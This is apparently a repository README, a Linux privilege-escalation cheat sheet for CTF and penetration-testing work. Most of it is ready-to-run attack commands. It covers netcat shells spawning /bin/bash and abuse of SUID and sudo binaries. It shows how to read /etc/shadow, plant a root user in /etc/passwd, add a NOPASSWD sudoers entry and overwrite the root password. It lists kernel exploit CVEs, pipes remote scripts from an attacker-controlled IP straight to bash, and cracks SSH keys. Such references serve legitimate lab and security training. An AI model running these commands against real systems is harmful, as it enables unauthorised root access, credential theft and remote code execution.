[
  {
    "path": "README.md",
    "content": "# Linux-Privilege-Escalation\nTips and Tricks for Linux Priv Escalation\n\nFix the Shell:\n```bash\npython -c 'import pty; pty.spawn(\"/bin/bash\")'\nCtrl-Z\n\n# In Kali, note the number of rows and cols in the current terminal window\n$ stty -a  \n\n# Next we put the local terminal into raw mode without echo so we can use TAB autocompletion\n$ stty raw -echo\n$ fg\n\n# In the reverse shell\n$ stty rows <num> columns <cols>\n\n# Finally\n$ reset\n$ export SHELL=bash\n$ export TERM=xterm-256color\n```\n\n## Start with the basics\n\nWho am I and what groups do I belong to?  \n`id`\n\nWho else is on this box (lateral movement)?  \n`ls -la /home`  \n`cat /etc/passwd`  \n\nWhat kernel version and distro are we working with here?  \n`uname -a`  \n`cat /etc/issue`  \n\nWhat new processes are running on the server (thanks to IPPSEC for the script!):  \n```bash\n#!/bin/bash\n\n# Loop by line\nIFS=$'\\n'\n\n# Snapshot the process tree, excluding this script and its own helper commands\nold_process=$(ps aux --forest | grep -v \"ps aux --forest\" | grep -v \"sleep 1\" | grep -v \"$0\")\n\nwhile true; do\n  new_process=$(ps aux --forest | grep -v \"ps aux --forest\" | grep -v \"sleep 1\" | grep -v \"$0\")\n  # Print only the lines that appeared (>) or disappeared (<) since the last snapshot\n  diff <(echo \"$old_process\") <(echo \"$new_process\") | grep '^[<>]'\n  sleep 1\n  old_process=$new_process\ndone\n```\n\nWe can also use pspy on Linux to monitor the processes that are starting up and running:  \nhttps://github.com/DominicBreuker/pspy\n\nCheck the services that are listening:\n```bash\nss -lnpt\n```\n\n\n## What can we EXECUTE?\n\nWho can execute code as root (you will probably get a permission denied)?  \n`cat /etc/sudoers`\n\nCan I execute code as root (you will need the user's password)?  \n`sudo -l`\n\nWhich executables have the SUID bit set so they run as another user?  
\n`find / -type f -user root -perm /u+s -ls 2>/dev/null`  \n`find / -user root -perm -4000 -print 2>/dev/null`  \n`find / -perm -u=s -type f 2>/dev/null`  \n`find / -user root -perm -4000 -exec ls -ldb {} \\;`  \n\nDo any of the SUID binaries run commands that are vulnerable to file path manipulation?  \n`strings /usr/local/bin/binaryelf`  \n`mail`  \n`echo \"/bin/sh\" > /tmp/mail`  \n`cd /tmp`  \n`export PATH=.`  \n`/usr/local/bin/binaryelf`  \n\nDo any of the SUID binaries run commands that are vulnerable to Bash function manipulation?  \n`strings /usr/bin/binaryelf`  \n`mail`  \n`function /usr/bin/mail() { /bin/sh; }`  \n`export -f /usr/bin/mail`  \n`/usr/bin/binaryelf`  \n\nCan I write files into a folder containing a SUID bit file?  \nIt might be possible to take advantage of a '.' in the PATH or of the IFS (Internal Field Separator) exploit.  \n\nIf any of the following commands appear on the list of SUID or SUDO commands, they can be used for privilege escalation:\n\n| SUID / SUDO Executables               | Priv Esc Command (will need to prefix with sudo if you are using sudo for priv esc.) 
|\n|---------------------------------------|-------------------------------------------------------------------------------------|\n| (ALL : ALL ) ALL                      | You can run any command as root.<br>sudo su - <br>sudo /bin/bash                                 |\n| nmap<br>(older versions 2.02 to 5.21) | nmap --interactive<br>!sh                                                           |\n| netcat<br>nc<br>nc.traditional        | nc -nlvp 4444 &<br> nc -e /bin/bash 127.0.0.1 4444                                  |\n| ncat                                  |                                                                                     |\n| awk <br>gawk                          | awk '{ print }' /etc/shadow <br> awk 'BEGIN {system(\"id\")}'                         |\n| python                                | python -c 'import pty;pty.spawn(\"/bin/bash\")'                                       |\n| php                                   |      |\n| find                                  | find /home -exec nc -lvp 4444 -e /bin/bash \\\\;<br> find /home -exec /bin/bash \\\\;  |\n| xxd                                   |                                                                                     |\n| vi                                    |                                                                                     |\n| more                                  |                                                                                     |\n| less                                  |                                                                                     |\n| nano                                  |                                                                                     |\n| cp                                    |                                                                                     |\n| cat                                   |                                                                                
     |\n| bash                                  |                                                                                     |\n| ash                                   |                                                                                     |\n| sh                                    |                                                                                     |\n| csh                                   |                                                                                     |\n| curl                                  |                                                                                     |\n| dash                                  |                                                                                     |\n| pico                                  |                                                                                     |\n| vim                                   |                                                                                     |\n| tclsh                                 |                                                                                     |\n| git                                   |                                                                                     |\n| scp                                   |                                                                                     |\n| expect                                |                                                                                     |\n| ftp                                   |                                                                                     |\n| socat                                 |                                                                                     |\n| script                                |                 
                                                                     |\n| ssh                                   |                                                                                     |\n| zsh                                   |                                                                                     |\n| strace                                | Write and compile a small C++ program to use as the SUID binary (named suid below) <br> strace chown root:root suid <br> strace chmod u+s suid <br> ./suid |\n| npm                                   | ln -s /etc/shadow package.json && sudo /usr/bin/npm i *                            |\n| rsync                                 |                                                                                     |\n| tar                                   |                                                                                     |\n| Screen-4.5.00                         | https://www.exploit-db.com/exploits/41154/                                          |\n\n*Note:* You can find an incredible list of Linux binaries that can lead to privilege escalation at the GTFOBins project website here:  \nhttps://gtfobins.github.io/\n\n\nCan I access services that are running as root on the local network?  
\n`netstat -antup`  \n`ps -aux | grep root`  \n\n| Network Services Running as Root      | Exploit actions                                                                     |\n|---------------------------------------|-------------------------------------------------------------------------------------|\n| mysql                                 | raptor_udf2 exploit<br> 0xdeadbeef.info/exploits/raptor_udf2.c <br> insert into foo values(load_file('/home/smeagol/raptor_udf2.so'));                   |\n| apache                                | drop a reverse shell script on to the webserver                                     |\n| nfs                                   | no_root_squash parameter <br>  Or <br> if you create the same user name and matching user id as the remote share you can gain access to the files and write new files to the share  |\n| PostgreSQL                            | https://www.exploit-db.com/exploits/45184/                                          |\n\n\nAre there any active tmux sessions we can connect to?  \n`tmux ls`  \n\n## What can we READ?\nWhat files and folders are in my user's home directory?  \n`ls -la ~`  \n\nDo any users have password hashes stored in the passwd file?  \n`cat /etc/passwd`  \n\nAre there passwords for other users or RSA keys for SSHing into the box?  
\n`ssh -i id_rsa root@10.10.10.10`  \n\nAre there configuration files that contain credentials?\n\n| Application and config file           | Config File Contents                                                                |\n|---------------------------------------|-------------------------------------------------------------------------------------|\n| WolfCMS <br> config.php               | // Database settings: <br> define('DB_DSN', 'mysql:dbname=wolf;host=localhost;port=3306');<br> define('DB_USER', 'root');<br> define('DB_PASS', 'john@123');<br>        |\n| Generic PHP Web App                   | define('DB_PASSWORD', 's3cret');                                                     |\n| .ssh directory                        | authorized_keys<br>id_rsa<br>id_rsa.keystore<br>id_rsa.pub<br>known_hosts            |\n| User MySQL Info                       | .mysql_history<br>.my.cnf                                                           |\n| User Bash History                     | .bash_history                                                                       |\n\nAre any of the discovered credentials being reused by multiple accounts?  \n`su - username`  \n`sudo -s`  \n\nAre there any cron jobs running?  \n`cat /etc/crontab`  \n\nWhat files have been modified most recently?  \n`find /etc -type f -printf '%TY-%Tm-%Td %TT %p\\n' | sort -r`  \n`find /home -type f -mmin -60`  \n`find / -type f -mtime -2`  \n\nIs the user a member of the disk group, and can we read the contents of the file system?  \n`debugfs /dev/sda`  \n`debugfs: cat /root/.ssh/id_rsa`  \n`debugfs: cat /etc/shadow`  \n\nIs the user a member of the video group, and can we read the framebuffer?  \n`cat /dev/fb0 > /tmp/screen.raw`  \n`cat /sys/class/graphics/fb0/virtual_size`  \n\n## Where can we WRITE?\n\nWhich files can I write to? (The prunes skip the noisy pseudo and system filesystems; note that the prunes must come before the `-type f -writable` test or the command lists directories instead of writable files.)  \n`find / -path /sys -prune -o -path /proc -prune -o -path /usr -prune -o -path /lib -prune -o -type f -writable -print 2>/dev/null`  \n\nWhich folders can I write to?  
\n`find / -regextype posix-extended -regex \"/(sys|srv|proc|usr|lib|var)\" -prune -o -type d -writable -print 2>/dev/null`  \n\n| Writable Folder / file    | Priv Esc Command                                                                                |\n|---------------------------|-------------------------------------------------------------------------------------------------|\n| /home/*USER*/             | Create an SSH key pair, append the public key to .ssh/authorized_keys, then SSH into the account |\n| /etc/passwd               | manually add a user with a password of \"password\" using the following syntax<br>user:$1$xtTrK/At$Ga7qELQGiIklZGDhc6T5J0:1000:1000:,,,:/home/user:/bin/bash <br> You can even escalate to the root user in some cases with the following syntax: <br> admin:$1$xtTrK/At$Ga7qELQGiIklZGDhc6T5J0:0:0:,,,:/root:/bin/bash                         |\n\n\n*Root SSH Key* If root can log in via SSH, then you might be able to find a method of adding a key to the /root/.ssh/authorized_keys file.  
\n```\ngrep PermitRootLogin /etc/ssh/sshd_config\n```  \n*Add SUDOers* If we can write arbitrary files to the host as root, it is possible to add users to the sudoers file like so (NOTE: you will need to log out and log in again as myuser):  \n/etc/sudoers  \n```\nroot    ALL=(ALL:ALL) ALL\n%sudo   ALL=(ALL:ALL) ALL\nmyuser  ALL=(ALL) NOPASSWD:ALL\n```\n*Set Root Password* We can also change the root password on the host if we can write to any file as root:  \n/etc/shadow  \n```\nprintf root:>shadow\nopenssl passwd -1 -salt salty password >>shadow\n```\n\n## Kernel Exploits\n\nBased on the kernel version, do we have some reliable exploits that can be used?\n\nUDEV - Linux Kernel < 2.6 & UDEV < 1.4.1 - CVE-2009-1185 - April 2009  \n\n\tUbuntu 8.10  \n\tUbuntu 9.04  \n\tGentoo  \n\nRDS - Linux Kernel <= 2.6.36-rc8 - CVE-2010-3904  \n\n\tCentOS 4/5  \n\nperf_swevent_init - Linux Kernel < 3.8.9 (x86-64) - CVE-2013-2094 - June 2013  \n\n\tUbuntu 12.04.2  \n\nmempodipper - Linux Kernel 2.6.39 < 3.2.2 (x86-64) - CVE-2012-0056 - January 2012  \n\n\tUbuntu 11.10  \n\tUbuntu 10.04  \n\tRed Hat 6  \n\tOracle 6  \n\nDirty Cow - Linux Kernel 2.6.22 < 3.2.0/3.13.0/4.8.3 - CVE-2016-5195 - October 2016  \n\n\tUbuntu 12.04  \n\tUbuntu 14.04  \n\tUbuntu 16.04  \n\nKASLR / SMEP - Linux Kernel < 4.4.0-83 / < 4.8.0-58 - CVE-2017-1000112 - August 2017  \n\n\tUbuntu 14.04  \n\tUbuntu 16.04  \n\nGreat list here:  \nhttps://github.com/lucyoa/kernel-exploits\n\n## Automated Linux Enumeration Scripts\nIt is always a great idea to automate the enumeration process once you understand what you are looking for.\n\n### LinEnum.sh\nLinEnum is a handy method of automating Linux enumeration.  It is also written as a shell script and does not require any other interpreters (Python, Perl, etc.), 
which allows you to run it file-lessly in memory.\n\nFirst we need to clone a copy onto our local Kali Linux machine:\n```\ngit clone https://github.com/rebootuser/LinEnum.git\n```\nNext we can serve it up with the Python simple web server:\n```\nroot@kali:~test# cd LinEnum/\nroot@kali:~test/LinEnum# ls\nroot@kali:~test/LinEnum# python -m SimpleHTTPServer 80\nServing HTTP on 0.0.0.0 port 80 ...\n```\nAnd now on our remote Linux machine we can pull down the script and pipe it directly to Bash:\n```\nwww-data@vulnerable:/var/www$ curl 10.10.10.10/LinEnum.sh | bash\n```\nAnd the enumeration script should run on the remote machine.\n\n## CTF Machine Tactics\n\nOften it is easy to identify when a machine was created by the date / time of file edits.\nWe can create a list of all the files with a modify time in that timeframe with the following command (permission errors are discarded so only the file list lands in the output file):\n```\nfind -L / -type f -newermt 2019-08-24 ! -newermt 2019-08-27 2>/dev/null > /tmp/foundfiles.txt\n```\nThis has helped me to find interesting files on a few different CTF machines.\n\nRecursively searching for passwords is also a handy technique:\n```\ngrep -ri \"passw\" .\n```\n\nPipe a remote URL directly to Bash with wget (linpeas):\n```\nwget -q -O - \"http://10.10.10.10/linpeas.sh\" | bash\n```\n\nPipe a remote URL directly to Bash with curl (linpeas):\n```\ncurl -sSk \"http://10.10.10.10/linpeas.sh\" | bash\n```\n\n## Using SSH Keys\nOften, we are provided with password protected SSH keys on CTF boxes.  
It is helpful to be able to quickly crack these and add them to your private keys.\n\nFirst we need to convert the SSH key using John:\n```\nkali@kali:~/.ssh$ /usr/share/john/ssh2john.py ./id_rsa > ./id_rsa_john\n...\n```\n\nNext we will need to use that format to crack the password:\n```\n/usr/sbin/john --wordlist=/usr/share/wordlists/rockyou.txt ./id_rsa_john\n```\n\nJohn should output a password for the private key.\n\n\n## References\n\nhttps://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/  \nhttp://www.hackingarticles.in/linux-privilege-escalation-using-exploiting-sudo-rights/  \nhttps://payatu.com/guide-linux-privilege-escalation/  \nhttp://www.hackingarticles.in/editing-etc-passwd-file-for-privilege-escalation/  \nhttp://www.0daysecurity.com/penetration-testing/enumeration.html  \nhttps://www.rebootuser.com/?p=1623#.V0W5Pbp95JP  \nhttps://www.doomedraven.com/2013/04/hacking-linux-part-i-privilege.html  \nhttps://securism.wordpress.com/oscp-notes-privilege-escalation-linux/  \nhttps://haiderm.com/linux-privilege-escalation-using-weak-nfs-permissions/  \nhttp://hackingandsecurity.blogspot.com/2016/06/exploiting-network-file-system-nfs.html  \nhttps://www.defensecode.com/public/DefenseCode_Unix_WildCards_Gone_Wild.txt  \nhttps://hkh4cks.com/blog/2017/12/30/linux-enumeration-cheatsheet/  \nhttps://digi.ninja/blog/when_all_you_can_do_is_read.php  \nhttps://medium.com/@D00MFist/vulnhub-lin-security-1-d9749ea645e2  \nhttps://gtfobins.github.io/  \nhttps://github.com/rebootuser/LinEnum\n\n"
  }
]